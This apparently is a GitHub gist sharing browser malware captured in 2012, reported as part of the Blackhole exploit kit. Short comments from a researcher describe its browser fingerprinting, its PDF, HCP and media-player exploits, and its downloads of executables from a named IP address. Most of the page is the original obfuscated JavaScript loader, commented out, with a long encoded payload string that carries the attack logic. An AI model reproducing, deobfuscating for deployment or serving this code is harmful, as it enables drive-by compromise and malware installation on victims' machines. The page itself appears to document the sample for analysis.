Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Browser malware found in the wild, 02/28/2012, deobf version
/* Hello from upgradeyour.com (coming soon),
I've done some security work in the past and figured this would be a fun and quick puzzle, I found the same hash as scott on http://50.116.17.63/stats/counter.php?id=547b373f97233059 and googling it led to his post :)
it tries to identify browser/os version, and possibly run a wmp exp
It also tries to visit http://50.116.17.63/stats/w.php?f=b6863&e=4 and http://50.116.17.63/stats/w.php?f=b6863&e=1 and download+exec, two different exes
It tries a pdf exploit ( http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0188 and also http://50.116.17.63/stats/content/ap2.php?f=b6863 and http://50.116.17.63/content/ap1.php ? f = b6863 ), and hcp exploit as well ( http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885 ), and some pdf exploit
This is all part of the blackhole exploit kit, and this botnet is seemingly Huge!
Scotts post is below, and after is thw deobfuscated eval and shellcode it tries to run
*/
/*
<!-- Fake "Better Business Bureau" email had a link going to a compromised site with obfuscated JS, which ultimately created an iFrame that loaded this on a remote domain with /main.php?page=[some_characters]. -->
<!-- Probably some drive-by exploit, don't run this on - er, well - anything - but especially not WinXP. -->
<!-- commented out to prevent accidental execution, too. -->
/*<html><body><script>
/*
ss='s';g='g';r='r';d='d';c='c';t='t';
try{new window(123).typ;}catch(qq){aa=/d/.exec("a"+"ds").index+[];e=window.eval;cc=document;}
aaa=1+[];
try{new btoa({});}catch(qqq){
if(aaa==aa)
a="ti#yo#tu#ut#yu#to#yi#ur#r#uu#uw#ye#ur#to#cw#ce#qi#tu#to#yi#ur#to#uw#wp#qi#yw#u#wp#ei#yy#to#tt#ue#to#cqp#uu#tt#ye#ur#cqp#up#tt#yq#to#cqp#ye#ue#cqp#yy#yo#tt#ti#ye#yi#yq#r#r#r#qi#t#yw#u#wp#qi#t#tu#to#yi#ur#to#uw#wp#qi#yw#uw#wp#ce#cq#qu#yp#ut#yi#tu#ur#ye#yo#yi#cqp#to#yi#ti#te#uw#to#ti#ye#uw#to#tu#ur#cw#cq#iq#ie#uy#tt#uw#cqp#up#ti#yp#uy#to#uw#qo#ro#y#w#y#w#y#w#y#tq#w#yp#yy#tt#ue#yw#uy#to#uw#qo#ro#y#w#y#w#y#w#y#tq#qu#ur#uw#uo#iq#uy#tt#uw#cqp#ei#yy#ut#yq#ye#yi#wy#to#ur#to#tu#ur#qo#iq#uy#to#uw#ue#ye#yo#yi#qy#ci#y#r#qe#r#qw#ci#w#yi#tt#yu#to#qy#ci#ei#yy#ut#yq#ye#yi#wy#to#ur#to#tu#ur#ci#w#yw#tt#yi#ti#yy#to#uw#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#tu#w#ty#w#tt#cq#iq#uw#to#ur#ut#uw#yi#cqp#yp#ut#yi#tu#ur#ye#yo#yi#cw#cq#iq#tu#cw#ty#w#tt#cq#ie#ie#w#ye#ue#wy#to#yp#ye#yi#to#ti#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ty#cq#iq#uw#to#ur#ut#uw#yi#cqp#ur#uo#up#to#yo#yp#cqp#ty#co#qo#ci#ut#yi#ti#to#yp#ye#yi#to#ti#ci#ie#w#ye#ue#we#uw#uw#tt#uo#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ty#cq#iq#uw#to#ur#ut#uw#yi#cw#t#tt#uw#uw#tt#uo#t#ye#cq#r#ur#to#ue#ur#cw#eu#ty#yr#to#tu#ur#r#up#uw#yo#ur#yo#ur#uo#up#to#r#ur#yo#rq#ur#uw#ye#yi#yq#r#tu#tt#yy#yy#cw#ty#cq#cq#ie#w#ye#ue#wi#ut#yi#tu#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ty#cq#iq#uw#to#ur#ut#uw#yi#cqp#ur#uo#up#to#yo#yp#cqp#ty#qo#qo#ci#yp#ut#yi#tu#ur#ye#yo#yi#ci#ie#w#ye#ue#rq#ur#uw#ye#yi#yq#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ty#cq#iq#uw#to#ur#ut#uw#yi#cqp#ur#uo#up#to#yo#yp#cqp#ty#qo#qo#ci#ue#ur#uw#ye#yi#yq#ci#ie#w#ye#ue#ey#ut#yu#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ty#cq#iq#uw#to#ur#ut#uw#yi#cqp#ur#uo#up#to#yo#yp#cqp#ty#qo#qo#ci#yi#ut#yu#ty#to#uw#ci#ie#w#ye#ue#rq#ur#uw#ey#ut#yu#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ty#cq#iq#uw#to#ur#ut#uw#yi#cw#ur#uo#up#to#yo#yp#cqp#ty#qo#qo#ci#ue#ur#uw#ye#yi#yq#ci#cr#cr#cw#t#tp#ti#t#cq#r#ur#to#ue#ur#cw#ty#cq#cq#ie#w#yq#to#ur#ey#ut#yu#rp#to#yq#ui#qy#t#ro#tp#ti#tq#ro#tp#ti#tp#r#tp#te#w#e#tq#p#t#w#ue#up#yy#ye#ur#ey#ut#yu#rp#to#yq#ui#qy#t#ro#tp#r#tp#te#w#e#tq#t#yq#w#yq#to#ur#ey#ut#yu#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ty#w#tu#cq#iq#uy#tt#uw#cqp#ti#qo#ur#yw#ye#ue#w#tt#qo#ti#r#ye#ue#rq#ur#uw#ey#ut#yu#cw#ty#cq#wq#cw#ti#r#ye#ue#wy#to#yp#ye#yi#to#ti#cw#tu#cq#wq#yi#to#uu#cqp#rp#to#yq#wu#ui#up#cw#tu#cq#qy#ti#r#yq#to#ur#ey#ut#yu#rp#to#yq#ui#cq#r#to#ui#to#tu#cw#ty#cq#qy#yi#ut#yy#yy#qu#uw#to#ur#ut#uw#yi#cqp#tt#wq#tt#ro#y#tq#qy#yi#ut#yy#yy#ie#w#tu#yo#yu#up#tt#uw#to#ey#ut#yu#ue#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#yw#w#yp#w#ti#cq#iq#uy#tt#uw#cqp#to#qo#ur#yw#ye#ue#w#tu#w#ty#w#tt#w#yq#qo#up#tt#uw#ue#to#eq#yi#ur#qu#ye#yp#cw#to#r#ye#ue#rq#ur#uw#ey#ut#yu#cw#yw#cq#cr#cr#to#r#ye#ue#rq#ur#uw#ey#ut#yu#cw#yp#cq#cq#iq#ye#yp#cw#to#r#ye#ue#wy#to#yp#ye#yi#to#ti#cw#ti#cq#cr#cr#ti#r#tu#yo#yu#up#tt#uw#to#ey#ut#yu#ue#cq#iq#uw#to#ur#ut#uw#yi#cqp#ti#r#tu#yo#yu#up#tt#uw#to#ey#ut#yu#ue#cw#yw#w#yp#cq#ie#tu#qo#yw#r#ue#up#yy#ye#ur#cw#to#r#ue#up#yy#ye#ur#ey#ut#yu#rp#to#yq#ui#cq#qu#ty#qo#yp#r#ue#up#yy#ye#ur#cw#to#r#ue#up#yy#ye#ur#ey#ut#yu#rp#to#yq#ui#cq#qu#yp#yo#uw#cw#tt#qo#y#qu#tt#qi#et#tt#ur#yw#r#yu#ye#yi#cw#tu#r#yy#to#yi#yq#ur#yw#w#ty#r#yy#to#yi#yq#ur#yw#cq#qu#tt#q#q#cq#iq#ye#yp#cw#yq#cw#tu#ro#tt#tq#w#u#y#cq#wp#yq#cw#ty#ro#tt#tq#w#u#y#cq#cq#iq#uw#to#ur#ut#uw#yi#cqp#u#ie#ye#yp#cw#yq#cw#tu#ro#tt#tq#w#u#y#cq#qi#yq#cw#ty#ro#tt#tq#w#u#y#cq#cq#iq#uw#to#ur#ut#uw#yi#cqp#e#u#ie#ie#ie#uw#to#ur#ut#uw#yi#cqp#y#ie#w#yp#yo#uw#yu#tt#ur#ey#ut#yu#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ty#w#tu#cq#iq#uy#tt#uw#cqp#ti#qo#ur#yw#ye#ue#w#tt#w#to#qu#ye#yp#cw#co#ti#r#ye#ue#rq#ur#uw#ey#ut#yu#cw#ty#cq#cq#iq#uw#to#ur#ut#uw#yi#cqp#yi#ut#yy#yy#ie#ye#yp#cw#co#ti#r#ye#ue#ey#ut#yu#cw#tu#cq#cq#iq#tu#qo#qp#ie#tu#e#e#qu#to#qo#ty#r#uw#to#up#yy#tt#tu#to#cw#t#tp#ue#t#yq#w#ci#ci#cq#r#ue#up#yy#ye#ur#cw#ti#r#ue#up#yy#ye#ur#ey#ut#yu#rp#to#yq#ui#cq#r#tu#yo#yi#tu#tt#ur#cw#ro#ci#y#ci#w#ci#y#ci#w#ci#y#ci#w#ci#y#ci#tq#cq#qu#yp#yo#uw#cw#tt#qo#y#qu#tt#qi#qp#qu#tt#q#q#cq#iq#ye#yp#cw#t#tw#cw#y#q#cq#cw#r#q#cq#cy#t#r#ur#to#ue#ur#cw#to#ro#tt#tq#cq#cq#iq#to#ro#tt#tq#qo#rp#to#yq#wu#ui#up#r#cy#i#ie#ye#yp#cw#tt#wp#tu#iw#iw#co#cw#t#tp#ti#t#cq#r#ur#to#ue#ur#cw#to#ro#tt#tq#cq#cq#iq#to#ro#tt#tq#qo#ci#y#ci#ie#ie#uw#to#ur#ut#uw#yi#cqp#to#r#ue#yy#ye#tu#to#cw#y#w#qp#cq#r#yr#yo#ye#yi#cw#ci#w#ci#cq#ie#w#cy#cy#yw#tt#ue#et#ye#yu#to#rw#uo#up#to#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#tt#cq#iq#uw#to#ur#ut#uw#yi#cqp#yp#ut#yi#tu#ur#ye#yo#yi#cw#ti#cq#iq#ye#yp#cw#co#tt#r#ye#ue#eq#wu#cr#cr#ti#cq#iq#uy#tt#uw#cqp#tu#w#ty#w#to#w#yp#qo#tt#r#ye#ue#rq#ur#uw#ye#yi#yq#cw#ti#cq#wq#ro#ti#tq#qy#ti#qu#ye#yp#cw#co#yp#iw#iw#co#yp#r#yy#to#yi#yq#ur#yw#cq#iq#uw#to#ur#ut#uw#yi#cqp#yi#ut#yy#yy#ie#yp#yo#uw#cw#to#qo#y#qu#to#qi#yp#r#yy#to#yi#yq#ur#yw#qu#to#q#q#cq#iq#ye#yp#cw#t#ro#tw#tp#ue#tq#t#r#ur#to#ue#ur#cw#yp#ro#to#tq#cq#cr#cr#cw#tu#qo#yi#tt#uy#ye#yq#tt#ur#yo#uw#r#yu#ye#yu#to#rw#uo#up#to#ue#ro#yp#ro#to#tq#tq#cq#cr#cr#cw#ty#qo#tu#r#to#yi#tt#ty#yy#to#ti#ei#yy#ut#yq#ye#yi#cq#cr#cr#cw#ty#r#yi#tt#yu#to#iw#iw#ty#r#ti#to#ue#tu#uw#ye#up#ur#ye#yo#yi#cq#cq#iq#uw#to#ur#ut#uw#yi#cqp#tu#ie#ie#ie#uw#to#ur#ut#uw#yi#cqp#yi#ut#yy#yy#ie#ie#w#yp#ye#yi#ti#ey#tt#uy#ei#yy#ut#yq#ye#yi#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#yy#w#to#w#tu#cq#iq#uy#tt#uw#cqp#yr#qo#ur#yw#ye#ue#w#yw#qo#yi#to#uu#cqp#rp#to#yq#wu#ui#up#cw#yy#w#ci#ye#ci#cq#w#ti#qo#cw#co#yr#r#ye#ue#wy#to#yp#ye#yi#to#ti#cw#to#cq#iw#iw#to#cq#wq#t#tp#ti#t#qy#y#w#yt#qo#tu#wq#yi#to#uu#cqp#rp#to#yq#wu#ui#up#cw#tu#w#ci#ye#ci#cq#qy#y#w#tt#qo#yi#tt#uy#ye#yq#tt#ur#yo#uw#r#up#yy#ut#yq#ye#yi#ue#w#yq#qo#ci#ci#w#yp#w#ty#w#yu#qu#yp#yo#uw#cw#yp#qo#y#qu#yp#qi#tt#r#yy#to#yi#yq#ur#yw#qu#yp#q#q#cq#iq#yu#qo#tt#ro#yp#tq#r#ti#to#ue#tu#uw#ye#up#ur#ye#yo#yi#iw#iw#yq#qu#ty#qo#tt#ro#yp#tq#r#yi#tt#yu#to#iw#iw#yq#qu#ye#yp#cw#cw#yw#r#ur#to#ue#ur#cw#yu#cq#cr#cr#cw#co#ti#iw#iw#ti#r#ur#to#ue#ur#cw#rp#to#yq#wu#ui#up#r#yy#to#yp#ur#wt#yo#yi#ur#to#ui#ur#q#rp#to#yq#wu#ui#up#r#uw#ye#yq#yw#ur#wt#yo#yi#ur#to#ui#ur#cq#cq#cq#iw#iw#cw#yw#r#ur#to#ue#ur#cw#ty#cq#cr#cr#cw#co#ti#iw#iw#ti#r#ur#to#ue#ur#cw#rp#to#yq#wu#ui#up#r#yy#to#yp#ur#wt#yo#yi#ur#to#ui#ur#q#rp#to#yq#wu#ui#up#r#uw#ye#yq#yw#ur#wt#yo#yi#ur#to#ui#ur#cq#cq#cq#cq#iq#ye#yp#cw#co#yt#iw#iw#co#cw#yt#r#ur#to#ue#ur#cw#yu#cq#iw#iw#yt#r#ur#to#ue#ur#cw#ty#cq#cq#cq#iq#uw#to#ur#ut#uw#yi#cqp#tt#ro#yp#tq#ie#ie#ie#uw#to#ur#ut#uw#yi#cqp#yi#ut#yy#yy#ie#w#yq#to#ur#et#ye#yu#to#wu#yi#tt#ty#yy#to#ti#ei#yy#ut#yq#ye#yi#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#yt#w#yu#w#tu#cq#iq#uy#tt#uw#cqp#to#qo#ur#yw#ye#ue#w#yp#w#ty#qo#yi#to#uu#cqp#rp#to#yq#wu#ui#up#cw#yu#w#ci#ye#ci#cq#w#yw#qo#ci#ci#w#yq#qo#tu#wq#yi#to#uu#cqp#rp#to#yq#wu#ui#up#cw#tu#w#ci#ye#ci#cq#qy#y#w#tt#w#yy#w#ti#w#yr#qo#to#r#ye#ue#rq#ur#uw#ye#yi#yq#cw#yt#cq#wq#ro#yt#tq#qy#yt#qu#yp#yo#uw#cw#ti#qo#y#qu#ti#qi#yr#r#yy#to#yi#yq#ur#yw#qu#ti#q#q#cq#iq#ye#yp#cw#cw#yp#qo#to#r#yw#tt#ue#et#ye#yu#to#rw#uo#up#to#cw#yr#ro#ti#tq#cq#cq#cr#cr#cw#yp#qo#yp#r#to#yi#tt#ty#yy#to#ti#ei#yy#ut#yq#ye#yi#cq#cq#iq#yy#qo#yp#r#ti#to#ue#tu#uw#ye#up#ur#ye#yo#yi#iw#iw#yw#qu#tt#qo#yp#r#yi#tt#yu#to#iw#iw#yw#qu#ye#yp#cw#ty#r#ur#to#ue#ur#cw#yy#cq#iw#iw#ty#r#ur#to#ue#ur#cw#tt#cq#cq#iq#ye#yp#cw#co#yq#iw#iw#co#cw#yq#r#ur#to#ue#ur#cw#yy#cq#iw#iw#yq#r#ur#to#ue#ur#cw#tt#cq#cq#cq#iq#uw#to#ur#ut#uw#yi#cqp#yp#ie#ie#ie#ie#uw#to#ur#ut#uw#yi#cqp#y#ie#w#yq#to#ur#ei#yy#ut#yq#ye#yi#wi#ye#yy#to#rr#to#uw#ue#ye#yo#yi#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#yp#w#ty#cq#iq#uy#tt#uw#cqp#yw#qo#ur#yw#ye#ue#w#to#w#ti#w#yq#w#tt#w#tu#qo#e#u#qu#ye#yp#cw#yw#r#eu#rq#wp#i#iw#iw#co#yp#iw#iw#co#yp#r#uy#to#uw#ue#ye#yo#yi#iw#iw#co#cw#to#qo#yw#r#yq#to#ur#ey#ut#yu#cw#yp#r#uy#to#uw#ue#ye#yo#yi#cq#cq#cq#iq#uw#to#ur#ut#uw#yi#cqp#ty#ie#ye#yp#cw#co#ty#cq#iq#uw#to#ur#ut#uw#yi#cqp#to#ie#to#qo#yw#r#yp#yo#uw#yu#tt#ur#ey#ut#yu#cw#to#cq#qu#ty#qo#yw#r#yp#yo#uw#yu#tt#ur#ey#ut#yu#cw#ty#cq#qu#ti#qo#ty#r#ue#up#yy#ye#ur#cw#yw#r#ue#up#yy#ye#ur#ey#ut#yu#rp#to#yq#ui#cq#qu#yq#qo#to#r#ue#up#yy#ye#ur#cw#yw#r#ue#up#yy#ye#ur#ey#ut#yu#rp#to#yq#ui#cq#qu#yp#yo#uw#cw#tt#qo#y#qu#tt#qi#ti#r#yy#to#yi#yq#ur#yw#qu#tt#q#q#cq#iq#ye#yp#cw#tu#wp#e#u#cr#cr#tt#wp#tu#cr#cr#ti#ro#tt#tq#co#qo#ci#y#ci#cq#iq#uw#to#ur#ut#uw#yi#cqp#ty#ie#ye#yp#cw#yq#ro#tt#tq#co#qo#ti#ro#tt#tq#cq#iq#ye#yp#cw#tu#qo#qo#e#u#cq#iq#tu#qo#tt#ie#ye#yp#cw#ti#ro#tt#tq#co#qo#ci#y#ci#cq#iq#uw#to#ur#ut#uw#yi#cqp#ty#ie#ie#ie#uw#to#ur#ut#uw#yi#cqp#to#ie#w#we#ry#eu#qy#uu#ye#yi#ti#yo#uu#r#we#tu#ur#ye#uy#to#ry#eu#ty#yr#to#tu#ur#w#yq#to#ur#we#ry#eu#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#tt#cq#iq#uy#tt#uw#cqp#yp#qo#yi#ut#yy#yy#w#ti#w#ty#qo#ur#yw#ye#ue#w#tu#qo#iq#ie#qu#ur#uw#uo#iq#yp#qo#yi#to#uu#cqp#ty#r#we#ry#eu#cw#tt#cq#ie#tu#tt#ur#tu#yw#cw#ti#cq#iq#ie#uw#to#ur#ut#uw#yi#cqp#yp#ie#w#tu#yo#yi#uy#to#uw#ur#wi#ut#yi#tu#ue#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#yq#cq#iq#uy#tt#uw#cqp#tt#w#yw#w#yp#w#ty#qo#t#tw#ro#tp#cy#tq#ro#tp#cy#tq#t#w#ti#qo#iq#ie#w#tu#qo#ur#yw#ye#ue#qu#yp#yo#uw#cw#tt#cqp#ye#yi#cqp#yq#cq#iq#ye#yp#cw#ty#r#ur#to#ue#ur#cw#tt#cq#cq#iq#ti#ro#tt#tq#qo#u#ie#ie#yp#yo#uw#cw#tt#cqp#ye#yi#cqp#ti#cq#iq#ur#uw#uo#iq#yw#qo#tt#r#ue#yy#ye#tu#to#cw#i#cq#qu#ye#yp#cw#yw#r#yy#to#yi#yq#ur#yw#wp#y#cr#cr#co#yq#ro#yw#tq#cq#iq#yq#ro#yw#tq#qo#yq#ro#tt#tq#cw#yq#cq#qu#ti#to#yy#to#ur#to#cqp#yq#ro#tt#tq#ie#ie#tu#tt#ur#tu#yw#cw#yp#cq#iq#ie#ie#ie#w#ye#yi#ye#ur#rq#tu#uw#ye#up#ur#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#cq#iq#uy#tt#uw#cqp#tu#qo#ur#yw#ye#ue#w#tt#qo#yi#tt#uy#ye#yq#tt#ur#yo#uw#w#to#qo#ci#t#ci#w#ye#qo#tt#r#ut#ue#to#uw#we#yq#to#yi#ur#iw#iw#ci#ci#w#yq#qo#tt#r#uy#to#yi#ti#yo#uw#iw#iw#ci#ci#w#ty#qo#tt#r#up#yy#tt#ur#yp#yo#uw#yu#iw#iw#ci#ci#w#yw#qo#tt#r#up#uw#yo#ti#ut#tu#ur#iw#iw#ci#ci#qu#ye#yp#cw#tu#r#yp#ye#yy#to#cq#iq#tu#r#yp#ye#yy#to#r#cy#qo#tu#ie#ye#yp#cw#tu#r#uy#to#uw#ye#yp#uo#cq#iq#tu#r#uy#to#uw#ye#yp#uo#r#cy#qo#tu#ie#qu#tu#r#eu#rq#qo#u#y#y#qu#ye#yp#cw#ty#cq#iq#uy#tt#uw#cqp#yp#w#ti#qo#ro#ci#rt#ye#yi#ci#w#u#w#ci#et#tt#tu#ci#w#i#w#ci#er#ye#yi#ut#ui#ci#w#o#w#ci#wi#uw#to#to#wr#rq#wy#ci#w#qp#w#ci#ye#ei#yw#yo#yi#to#ci#w#i#u#r#u#w#ci#ye#ei#yo#ti#ci#w#i#u#r#i#w#ci#ye#ei#tt#ti#ci#w#i#u#r#o#w#ci#rt#ye#yi#r#p#wt#wu#ci#w#i#i#r#u#w#ci#rt#ye#yi#r#p#et#yo#ty#ye#yy#to#ci#w#i#i#r#i#w#ci#ei#yo#tu#yt#to#ur#tp#tp#ue#p#ei#wt#ci#w#i#i#r#o#w#ci#ci#w#u#y#y#tq#qu#yp#yo#uw#cw#yp#qo#ti#r#yy#to#yi#yq#ur#yw#e#i#qu#yp#wp#qo#y#qu#yp#qo#yp#e#i#cq#iq#ye#yp#cw#ti#ro#yp#tq#cr#cr#yi#to#uu#cqp#rp#to#yq#wu#ui#up#cw#ti#ro#yp#tq#w#ci#ye#ci#cq#r#ur#to#ue#ur#cw#ty#cq#cq#iq#tu#r#eu#rq#qo#ti#ro#yp#q#u#tq#qu#ty#uw#to#tt#yt#ie#ie#ie#tu#r#tu#yo#yi#uy#to#uw#ur#wi#ut#yi#tu#ue#cw#tu#cq#qu#tu#r#ye#ue#eq#wu#qo#yi#to#uu#cqp#wi#ut#yi#tu#ur#ye#yo#yi#cw#ci#uw#to#ur#ut#uw#yi#cqp#ci#q#to#q#ci#p#ww#tu#tu#te#yo#yi#co#ww#p#ci#q#to#q#ci#yp#tt#yy#ue#to#ci#cq#cw#cq#qu#tu#r#uy#to#uw#eq#wu#qo#tu#r#ye#ue#eq#wu#cr#cr#cw#t#et#rq#eq#wu#tp#ue#p#cw#tp#ti#q#tp#r#wq#tp#ti#p#cq#t#ye#cq#r#ur#to#ue#ur#cw#ye#cq#wq#up#tt#uw#ue#to#wi#yy#yo#tt#ur#cw#rp#to#yq#wu#ui#up#r#cy#u#w#u#y#cq#qy#yi#ut#yy#yy#qu#tu#r#we#tu#ur#ye#uy#to#ry#wu#yi#tt#ty#yy#to#ti#qo#yp#tt#yy#ue#to#qu#ye#yp#cw#tu#r#ye#ue#eq#wu#cq#iq#uy#tt#uw#cqp#yp#w#yr#qo#ro#ci#et#ue#ui#yu#yy#i#r#ry#et#er#ep#rw#rw#ei#ci#w#ci#et#ue#ui#yu#yy#i#r#wy#eu#et#wy#yo#tu#ut#yu#to#yi#ur#ci#w#ci#et#ye#tu#uw#yo#ue#yo#yp#ur#r#ry#et#er#wy#eu#et#ci#w#ci#rq#yw#yo#tu#yt#uu#tt#uy#to#wi#yy#tt#ue#yw#r#rq#yw#yo#tu#yt#uu#tt#uy#to#wi#yy#tt#ue#yw#ci#w#ci#rw#wy#wt#wt#ur#yy#r#rw#wy#wt#wt#ur#yy#ci#w#ci#rq#yw#to#yy#yy#r#re#eq#ep#to#yy#up#to#uw#ci#w#ci#rq#tu#uw#ye#up#ur#ye#yi#yq#r#wy#ye#tu#ur#ye#yo#yi#tt#uw#uo#ci#w#ci#uu#yu#up#yy#tt#uo#to#uw#r#yo#tu#ui#ci#tq#qu#yp#yo#uw#cw#yp#qo#y#qu#yp#qi#yr#r#yy#to#yi#yq#ur#yw#qu#yp#q#q#cq#iq#ye#yp#cw#tu#r#yq#to#ur#we#ry#eu#cw#yr#ro#yp#tq#cq#cq#iq#tu#r#we#tu#ur#ye#uy#to#ry#wu#yi#tt#ty#yy#to#ti#qo#ur#uw#ut#to#qu#ty#uw#to#tt#yt#ie#ie#tu#r#yw#to#tt#ti#qo#tu#r#ye#ue#wy#to#yp#ye#yi#to#ti#cw#ti#yo#tu#ut#yu#to#yi#ur#r#yq#to#ur#wu#yy#to#yu#to#yi#ur#ue#wr#uo#rw#tt#yq#ey#tt#yu#to#cq#wq#ti#yo#tu#ut#yu#to#yi#ur#r#yq#to#ur#wu#yy#to#yu#to#yi#ur#ue#wr#uo#rw#tt#yq#ey#tt#yu#to#cw#ci#yw#to#tt#ti#ci#cq#ro#y#tq#qy#yi#ut#yy#yy#ie#tu#r#ye#ue#wo#to#tu#yt#yo#qo#cw#t#wo#to#tu#yt#yo#t#ye#cq#r#ur#to#ue#ur#cw#yw#cq#cr#cr#cw#t#wo#to#tu#yt#yo#tp#ue#p#tp#t#tp#ue#p#tp#ti#t#ye#cq#r#ur#to#ue#ur#cw#ye#cq#qu#tu#r#uy#to#uw#wo#to#tu#yt#yo#qo#tu#r#ye#ue#wo#to#tu#yt#yo#wq#tu#r#yp#yo#uw#yu#tt#ur#ey#ut#yu#cw#cw#t#uw#uy#tp#ue#p#tp#qy#tp#ue#p#cw#ro#tp#r#tp#w#tp#ti#tq#q#cq#t#ye#cq#r#ur#to#ue#ur#cw#ye#cq#wq#rp#to#yq#wu#ui#up#r#cy#u#qy#ci#y#r#qt#ci#cq#qy#yi#ut#yy#yy#qu#tu#r#ye#ue#rq#tt#yp#tt#uw#ye#qo#cw#t#rq#tt#yp#tt#uw#ye#tp#ue#p#tp#t#tp#ue#p#tp#ti#t#ye#cq#r#ur#to#ue#ur#cw#ye#cq#cr#cr#cw#t#we#up#up#yy#to#t#ye#cq#r#ur#to#ue#ur#cw#yq#cq#qu#tu#r#ye#ue#wt#yw#uw#yo#yu#to#qo#cw#t#wt#yw#uw#yo#yu#to#tp#ue#p#tp#t#tp#ue#p#cw#tp#ti#ro#tp#ti#tp#r#tq#p#cq#t#ye#cq#r#ur#to#ue#ur#cw#ye#cq#qu#tu#r#uy#to#uw#wt#yw#uw#yo#yu#to#qo#tu#r#ye#ue#wt#yw#uw#yo#yu#to#wq#tu#r#yp#yo#uw#yu#tt#ur#ey#ut#yu#cw#rp#to#yq#wu#ui#up#r#cy#u#cq#qy#yi#ut#yy#yy#qu#tu#r#ye#ue#eu#up#to#uw#tt#qo#cw#t#eu#up#to#uw#tt#tp#ue#p#ro#tp#t#tq#wq#tp#ue#p#cw#tp#ti#q#tp#r#wq#tp#ti#p#cq#t#ye#cq#r#ur#to#ue#ur#cw#ye#cq#qu#tu#r#uy#to#uw#eu#up#to#uw#tt#qo#tu#r#ye#ue#eu#up#to#uw#tt#cr#cr#cw#cw#t#rr#to#uw#ue#ye#yo#yi#tp#ue#p#tp#t#tp#ue#p#cw#tp#ti#q#tp#r#wq#tp#ti#p#cq#t#ye#cq#r#ur#to#ue#ur#cw#ye#cq#iw#iw#u#cq#wq#up#tt#uw#ue#to#wi#yy#yo#tt#ur#cw#rp#to#yq#wu#ui#up#r#cy#u#w#u#y#cq#qy#yi#ut#yy#yy#qu#tu#r#tt#ti#ti#rt#ye#yi#wu#uy#to#yi#ur#cw#ci#yy#yo#tt#ti#ci#w#tu#r#yw#tt#yi#ti#yy#to#uw#cw#tu#r#uw#ut#yi#rt#er#yp#ut#yi#tu#ue#w#tu#cq#cq#ie#w#ye#yi#ye#ur#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#tu#cq#iq#uy#tt#uw#cqp#ty#qo#ur#yw#ye#ue#w#tt#w#tu#qu#ye#yp#cw#co#ty#r#ye#ue#rq#ur#uw#ye#yi#yq#cw#tu#cq#cq#iq#uw#to#ur#ut#uw#yi#cqp#e#o#ie#ye#yp#cw#tu#r#yy#to#yi#yq#ur#yw#qo#qo#u#cq#iq#ty#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#wy#to#yy#ye#yu#ye#ur#to#uw#qo#tu#qu#uw#to#ur#ut#uw#yi#cqp#e#o#ie#tu#qo#tu#r#ur#yo#er#yo#uu#to#uw#wt#tt#ue#to#cw#cq#r#uw#to#up#yy#tt#tu#to#cw#t#tp#ue#t#yq#w#ci#ci#cq#qu#tt#qo#ty#ro#tu#tq#qu#ye#yp#cw#co#tt#iw#iw#co#tt#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#cq#iq#uw#to#ur#ut#uw#yi#cqp#e#o#ie#ty#r#up#yy#ut#yq#ye#yi#qo#tt#qu#ye#yp#cw#co#ty#r#ye#ue#wy#to#yp#ye#yi#to#ti#cw#tt#r#ye#yi#ue#ur#tt#yy#yy#to#ti#cq#cq#iq#tt#r#ye#yi#ue#ur#tt#yy#yy#to#ti#qo#tt#r#uy#to#uw#ue#ye#yo#yi#qo#tt#r#uy#to#uw#ue#ye#yo#yi#y#qo#tt#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#wy#yo#yi#to#qo#yi#ut#yy#yy#qu#tt#r#cy#qo#ty#qu#tt#r#up#yy#ut#yq#ye#yi#ey#tt#yu#to#qo#tu#ie#ty#r#yq#tt#uw#ty#tt#yq#to#qo#yp#tt#yy#ue#to#qu#ye#yp#cw#ty#r#ye#ue#eq#wu#cr#cr#co#ty#r#we#tu#ur#ye#uy#to#ry#wu#yi#tt#ty#yy#to#ti#cq#iq#ye#yp#cw#tt#co#qo#qo#ty#r#yr#tt#uy#tt#cq#iq#uw#to#ur#ut#uw#yi#cqp#e#i#ie#ie#uw#to#ur#ut#uw#yi#cqp#u#ie#w#yp#ei#ut#ue#yw#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ty#w#tt#cq#iq#uy#tt#uw#cqp#tu#qo#ur#yw#ye#ue#qu#ye#yp#cw#tu#r#ye#ue#we#uw#uw#tt#uo#cw#tt#cq#cr#cr#cw#tu#r#ye#ue#wi#ut#yi#tu#cw#ty#cq#iw#iw#cw#tu#r#ye#ue#we#uw#uw#tt#uo#cw#ty#cq#cr#cr#ty#r#yy#to#yi#yq#ur#yw#wp#y#cr#cr#tu#r#ye#ue#wi#ut#yi#tu#cw#ty#ro#y#tq#cq#cq#cq#cq#iq#tt#r#up#ut#ue#yw#cw#ty#cq#ie#ie#w#tu#tt#yy#yy#we#uw#uw#tt#uo#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ty#cq#iq#uy#tt#uw#cqp#tu#qo#ur#yw#ye#ue#w#tt#qu#ye#yp#cw#tu#r#ye#ue#we#uw#uw#tt#uo#cw#ty#cq#cq#iq#yp#yo#uw#cw#tt#qo#y#qu#tt#qi#ty#r#yy#to#yi#yq#ur#yw#qu#tt#q#q#cq#iq#ye#yp#cw#ty#ro#tt#tq#qo#qo#qo#yi#ut#yy#yy#cq#iq#uw#to#ur#ut#uw#yi#i